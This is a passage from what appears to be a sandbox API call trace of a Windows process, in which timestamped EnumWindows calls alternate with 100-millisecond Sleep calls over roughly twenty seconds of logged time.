(lpEnumFunc=0x523ec0, lParam=0x2830000) [0175.940] Sleep (dwMilliseconds=0x64) [0176.015] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0176.017] Sleep (dwMilliseconds=0x64) [0176.067] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0176.068] Sleep (dwMilliseconds=0x64) [0176.127] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0176.127] Sleep (dwMilliseconds=0x64) [0176.179] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0176.179] Sleep (dwMilliseconds=0x64) [0176.282] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0176.283] Sleep (dwMilliseconds=0x64) [0176.360] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0176.360] Sleep (dwMilliseconds=0x64) [0176.396] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0176.577] Sleep (dwMilliseconds=0x64) [0176.661] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0176.662] Sleep (dwMilliseconds=0x64) [0176.728] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0176.729] Sleep (dwMilliseconds=0x64) [0176.807] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0176.808] Sleep (dwMilliseconds=0x64) [0176.886] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0176.886] Sleep (dwMilliseconds=0x64) [0176.965] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0176.966] Sleep (dwMilliseconds=0x64) [0177.010] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0177.011] Sleep (dwMilliseconds=0x64) [0177.089] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0177.090] Sleep (dwMilliseconds=0x64) [0177.165] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0177.166] Sleep (dwMilliseconds=0x64) [0177.223] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0177.223] Sleep (dwMilliseconds=0x64) [0177.239] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0177.267] Sleep (dwMilliseconds=0x64) [0177.297] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0177.309] Sleep (dwMilliseconds=0x64) [0177.373] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0177.520] Sleep (dwMilliseconds=0x64) [0177.554] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0177.556] Sleep (dwMilliseconds=0x64) [0177.621] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0177.992] Sleep (dwMilliseconds=0x64) [0178.065] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0178.197] Sleep (dwMilliseconds=0x64) [0178.278] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0178.572] Sleep (dwMilliseconds=0x64) [0178.664] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0178.665] Sleep (dwMilliseconds=0x64) [0178.726] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0178.726] Sleep (dwMilliseconds=0x64) [0178.829] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0178.829] Sleep (dwMilliseconds=0x64) [0178.913] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0178.913] Sleep (dwMilliseconds=0x64) [0178.988] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0178.989] Sleep (dwMilliseconds=0x64) [0179.099] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0179.100] Sleep (dwMilliseconds=0x64) [0179.178] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0179.182] Sleep (dwMilliseconds=0x64) [0179.252] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0179.253] Sleep (dwMilliseconds=0x64) [0179.326] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0179.326] Sleep (dwMilliseconds=0x64) [0179.403] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0179.404] Sleep (dwMilliseconds=0x64) [0179.447] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0179.447] Sleep (dwMilliseconds=0x64) [0179.515] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0179.516] Sleep (dwMilliseconds=0x64) [0179.592] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0179.593] Sleep (dwMilliseconds=0x64) [0179.661] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0179.661] Sleep (dwMilliseconds=0x64) [0179.719] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0179.719] Sleep (dwMilliseconds=0x64) [0179.818] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0179.819] Sleep (dwMilliseconds=0x64) [0179.892] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0179.893] Sleep (dwMilliseconds=0x64) [0179.940] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0179.941] Sleep (dwMilliseconds=0x64) [0180.014] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0180.015] Sleep (dwMilliseconds=0x64) [0180.090] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0180.091] Sleep (dwMilliseconds=0x64) [0180.156] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0180.157] Sleep (dwMilliseconds=0x64) [0180.214] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0180.214] Sleep (dwMilliseconds=0x64) [0180.359] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0180.359] Sleep (dwMilliseconds=0x64) [0180.437] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0180.438] Sleep (dwMilliseconds=0x64) [0180.510] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0180.511] Sleep (dwMilliseconds=0x64) [0180.611] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0180.612] Sleep (dwMilliseconds=0x64) [0180.692] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0180.693] Sleep (dwMilliseconds=0x64) [0180.790] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0180.793] Sleep (dwMilliseconds=0x64) [0180.838] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0180.839] Sleep (dwMilliseconds=0x64) [0180.914] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0180.915] Sleep (dwMilliseconds=0x64) [0181.002] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0181.004] Sleep (dwMilliseconds=0x64) [0181.084] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0181.085] Sleep (dwMilliseconds=0x64) [0181.157] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0181.232] Sleep (dwMilliseconds=0x64) [0181.328] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0181.329] Sleep (dwMilliseconds=0x64) [0181.392] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0181.393] Sleep (dwMilliseconds=0x64) [0181.446] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0181.448] Sleep (dwMilliseconds=0x64) [0181.526] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0181.527] Sleep (dwMilliseconds=0x64) [0181.599] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0181.601] Sleep (dwMilliseconds=0x64) [0181.696] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0181.696] Sleep (dwMilliseconds=0x64) [0181.797] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0181.798] Sleep (dwMilliseconds=0x64) [0181.874] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0181.875] Sleep (dwMilliseconds=0x64) [0181.954] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0181.955] Sleep (dwMilliseconds=0x64) [0181.993] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0181.993] Sleep (dwMilliseconds=0x64) [0182.076] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0182.078] Sleep (dwMilliseconds=0x64) [0182.155] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0182.156] Sleep (dwMilliseconds=0x64) [0182.230] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0182.231] Sleep (dwMilliseconds=0x64) [0182.308] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0182.455] Sleep (dwMilliseconds=0x64) [0182.494] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0182.775] Sleep (dwMilliseconds=0x64) [0182.823] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0182.824] Sleep (dwMilliseconds=0x64) [0182.896] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0182.897] Sleep (dwMilliseconds=0x64) [0182.976] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0182.977] Sleep (dwMilliseconds=0x64) [0183.048] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0183.049] Sleep (dwMilliseconds=0x64) [0183.091] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0183.093] Sleep (dwMilliseconds=0x64) [0183.169] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0183.170] Sleep (dwMilliseconds=0x64) [0183.242] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0183.243] Sleep (dwMilliseconds=0x64) [0183.315] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0183.316] Sleep (dwMilliseconds=0x64) [0183.391] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0183.392] Sleep (dwMilliseconds=0x64) [0183.471] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0183.472] Sleep (dwMilliseconds=0x64) [0183.534] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0183.535] Sleep (dwMilliseconds=0x64) [0183.583] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0183.583] Sleep (dwMilliseconds=0x64) [0183.676] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0183.677] Sleep (dwMilliseconds=0x64) [0183.777] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0183.778] Sleep (dwMilliseconds=0x64) [0183.902] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0183.903] Sleep (dwMilliseconds=0x64) [0183.979] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0183.980] Sleep (dwMilliseconds=0x64) [0184.054] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0184.055] Sleep (dwMilliseconds=0x64) [0184.128] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0184.129] Sleep (dwMilliseconds=0x64) [0184.167] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0184.168] Sleep (dwMilliseconds=0x64) [0184.245] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0184.246] Sleep (dwMilliseconds=0x64) [0184.323] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0184.324] Sleep (dwMilliseconds=0x64) [0184.403] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0184.404] Sleep (dwMilliseconds=0x64) [0184.499] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0184.499] Sleep (dwMilliseconds=0x64) [0184.576] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0184.576] Sleep (dwMilliseconds=0x64) [0184.659] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0184.660] Sleep (dwMilliseconds=0x64) [0184.712] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0184.713] Sleep (dwMilliseconds=0x64) [0184.804] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0184.804] Sleep (dwMilliseconds=0x64) [0184.883] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0184.884] Sleep (dwMilliseconds=0x64) [0184.960] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0184.961] Sleep (dwMilliseconds=0x64) [0185.121] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0185.123] Sleep (dwMilliseconds=0x64) [0185.224] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0185.305] Sleep (dwMilliseconds=0x64) [0185.396] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0185.397] Sleep (dwMilliseconds=0x64) [0185.444] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0185.445] Sleep (dwMilliseconds=0x64) [0185.540] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0185.542] Sleep (dwMilliseconds=0x64) [0185.634] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0185.634] Sleep (dwMilliseconds=0x64) [0185.717] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0185.718] Sleep (dwMilliseconds=0x64) [0185.815] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0185.816] Sleep (dwMilliseconds=0x64) [0185.897] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0185.898] Sleep (dwMilliseconds=0x64) [0185.973] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0185.974] Sleep (dwMilliseconds=0x64) [0186.358] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0186.360] Sleep (dwMilliseconds=0x64) [0186.389] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0186.412] Sleep (dwMilliseconds=0x64) [0186.446] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0186.449] Sleep (dwMilliseconds=0x64) [0186.521] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0186.522] Sleep (dwMilliseconds=0x64) [0186.604] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0186.605] Sleep (dwMilliseconds=0x64) [0186.684] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0186.685] Sleep (dwMilliseconds=0x64) [0186.782] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0186.782] Sleep (dwMilliseconds=0x64) [0186.855] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0186.860] Sleep (dwMilliseconds=0x64) [0186.919] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0186.920] Sleep (dwMilliseconds=0x64) [0186.969] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0186.970] Sleep (dwMilliseconds=0x64) [0187.067] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0187.068] Sleep (dwMilliseconds=0x64) [0187.143] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0187.144] Sleep (dwMilliseconds=0x64) [0187.213] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0187.214] Sleep (dwMilliseconds=0x64) [0187.292] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0187.294] Sleep (dwMilliseconds=0x64) [0187.338] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0187.376] Sleep (dwMilliseconds=0x64) [0187.449] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0187.449] Sleep (dwMilliseconds=0x64) [0187.562] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0187.563] Sleep (dwMilliseconds=0x64) [0187.632] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0187.633] Sleep (dwMilliseconds=0x64) [0187.716] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0187.720] Sleep (dwMilliseconds=0x64) [0187.812] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0187.812] Sleep (dwMilliseconds=0x64) [0187.861] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0188.670] Sleep (dwMilliseconds=0x64) [0188.769] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0188.770] Sleep (dwMilliseconds=0x64) [0188.846] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0188.847] Sleep (dwMilliseconds=0x64) [0188.924] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0188.925] Sleep (dwMilliseconds=0x64) [0189.007] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0189.008] Sleep (dwMilliseconds=0x64) [0189.109] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0189.110] Sleep (dwMilliseconds=0x64) [0189.165] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0189.166] Sleep (dwMilliseconds=0x64) [0189.218] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0189.219] Sleep (dwMilliseconds=0x64) [0189.317] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0189.318] Sleep (dwMilliseconds=0x64) [0189.407] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0189.408] Sleep (dwMilliseconds=0x64) [0189.491] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0189.492] Sleep (dwMilliseconds=0x64) [0189.590] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0189.592] Sleep (dwMilliseconds=0x64) [0189.693] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0189.694] Sleep (dwMilliseconds=0x64) [0189.758] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0189.759] Sleep (dwMilliseconds=0x64) [0189.799] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0189.800] Sleep (dwMilliseconds=0x64) [0189.876] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0189.877] Sleep (dwMilliseconds=0x64) [0190.082] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0190.089] Sleep (dwMilliseconds=0x64) [0190.166] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0190.168] Sleep (dwMilliseconds=0x64) [0190.243] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0190.244] Sleep (dwMilliseconds=0x64) [0190.325] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0190.327] Sleep (dwMilliseconds=0x64) [0190.408] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0190.409] Sleep (dwMilliseconds=0x64) [0190.454] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0190.455] Sleep (dwMilliseconds=0x64) [0190.528] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0190.529] Sleep (dwMilliseconds=0x64) [0190.616] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0190.617] Sleep (dwMilliseconds=0x64) [0190.698] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0190.699] Sleep (dwMilliseconds=0x64) [0190.776] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0190.777] Sleep (dwMilliseconds=0x64) [0190.850] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0190.852] Sleep (dwMilliseconds=0x64) [0190.923] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0190.924] Sleep (dwMilliseconds=0x64) [0190.978] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0191.071] Sleep (dwMilliseconds=0x64) [0191.149] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0191.150] Sleep (dwMilliseconds=0x64) [0191.232] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0191.233] Sleep (dwMilliseconds=0x64) [0191.320] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0191.335] Sleep (dwMilliseconds=0x64) [0191.412] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0191.413] Sleep (dwMilliseconds=0x64) [0191.492] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0191.493] Sleep (dwMilliseconds=0x64) [0191.569] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0191.569] Sleep (dwMilliseconds=0x64) [0191.609] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0191.610] Sleep (dwMilliseconds=0x64) [0191.705] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0191.706] Sleep (dwMilliseconds=0x64) [0191.797] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0191.798] Sleep (dwMilliseconds=0x64) [0191.872] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0191.873] Sleep (dwMilliseconds=0x64) [0191.963] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0191.965] Sleep (dwMilliseconds=0x64) [0192.010] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0192.057] Sleep (dwMilliseconds=0x64) [0192.099] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0192.100] Sleep (dwMilliseconds=0x64) [0192.128] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0192.130] Sleep (dwMilliseconds=0x64) [0192.186] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0192.189] Sleep (dwMilliseconds=0x64) [0192.411] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0192.412] Sleep (dwMilliseconds=0x64) [0192.500] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0192.502] Sleep (dwMilliseconds=0x64) [0192.580] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0192.581] Sleep (dwMilliseconds=0x64) [0192.704] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0192.705] Sleep (dwMilliseconds=0x64) [0192.742] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0192.743] Sleep (dwMilliseconds=0x64) [0192.789] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0192.790] Sleep (dwMilliseconds=0x64) [0192.804] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0192.805] Sleep (dwMilliseconds=0x64) [0192.832] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0192.832] Sleep (dwMilliseconds=0x64) [0192.868] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0192.868] Sleep (dwMilliseconds=0x64) [0192.909] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0192.910] Sleep (dwMilliseconds=0x64) [0192.951] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0192.952] Sleep (dwMilliseconds=0x64) [0192.990] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0192.990] Sleep (dwMilliseconds=0x64) [0193.066] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0193.067] Sleep (dwMilliseconds=0x64) [0193.080] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0193.080] Sleep (dwMilliseconds=0x64) [0193.105] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0193.105] Sleep (dwMilliseconds=0x64) [0193.145] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0193.146] Sleep (dwMilliseconds=0x64) [0193.183] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0193.184] Sleep (dwMilliseconds=0x64) [0193.225] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0193.253] Sleep (dwMilliseconds=0x64) [0193.300] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0193.301] Sleep (dwMilliseconds=0x64) [0193.328] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0193.329] Sleep (dwMilliseconds=0x64) [0193.341] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0193.341] Sleep (dwMilliseconds=0x64) [0193.382] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0193.383] Sleep (dwMilliseconds=0x64) [0193.421] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0193.422] Sleep (dwMilliseconds=0x64) [0193.428] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0193.428] Sleep (dwMilliseconds=0x64) [0193.461] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0193.462] Sleep (dwMilliseconds=0x64) [0193.500] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0193.501] Sleep (dwMilliseconds=0x64) [0193.521] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0193.522] Sleep (dwMilliseconds=0x64) [0193.575] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0193.576] Sleep (dwMilliseconds=0x64) [0193.613] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0193.614] Sleep (dwMilliseconds=0x64) [0193.657] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0193.658] Sleep (dwMilliseconds=0x64) [0193.662] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0193.663] Sleep (dwMilliseconds=0x64) [0193.701] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0193.702] Sleep (dwMilliseconds=0x64) [0193.748] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0193.749] Sleep (dwMilliseconds=0x64) [0193.768] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0193.768] Sleep (dwMilliseconds=0x64) [0193.793] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0193.793] Sleep (dwMilliseconds=0x64) [0193.829] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0193.830] Sleep (dwMilliseconds=0x64) [0193.864] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0193.865] Sleep (dwMilliseconds=0x64) [0193.868] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0193.869] Sleep (dwMilliseconds=0x64) [0193.905] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0193.906] Sleep (dwMilliseconds=0x64) [0193.943] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0193.944] Sleep (dwMilliseconds=0x64) [0193.953] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0193.954] Sleep (dwMilliseconds=0x64) [0193.980] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0193.981] Sleep (dwMilliseconds=0x64) [0194.069] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0194.070] Sleep (dwMilliseconds=0x64) [0194.102] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0194.103] Sleep (dwMilliseconds=0x64) [0194.135] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0194.136] Sleep (dwMilliseconds=0x64) [0194.172] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0194.173] Sleep (dwMilliseconds=0x64) [0194.208] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0194.209] Sleep (dwMilliseconds=0x64) [0194.217] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0194.218] Sleep (dwMilliseconds=0x64) [0194.247] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0194.248] Sleep (dwMilliseconds=0x64) [0194.338] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0194.340] Sleep (dwMilliseconds=0x64) [0194.373] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0194.377] Sleep (dwMilliseconds=0x64) [0194.395] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0194.396] Sleep (dwMilliseconds=0x64) [0194.438] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0194.439] Sleep (dwMilliseconds=0x64) [0194.476] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0194.477] Sleep (dwMilliseconds=0x64) [0194.481] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0194.481] Sleep (dwMilliseconds=0x64) [0194.514] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0194.515] Sleep (dwMilliseconds=0x64) [0194.552] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0194.553] Sleep (dwMilliseconds=0x64) [0194.567] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0194.567] Sleep (dwMilliseconds=0x64) [0194.601] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0194.603] Sleep (dwMilliseconds=0x64) [0194.646] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0194.647] Sleep (dwMilliseconds=0x64) [0195.923] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0195.924] Sleep (dwMilliseconds=0x64) [0196.115] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0196.116] Sleep (dwMilliseconds=0x64) [0196.167] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0196.168] Sleep (dwMilliseconds=0x64) [0196.250] EnumWindows 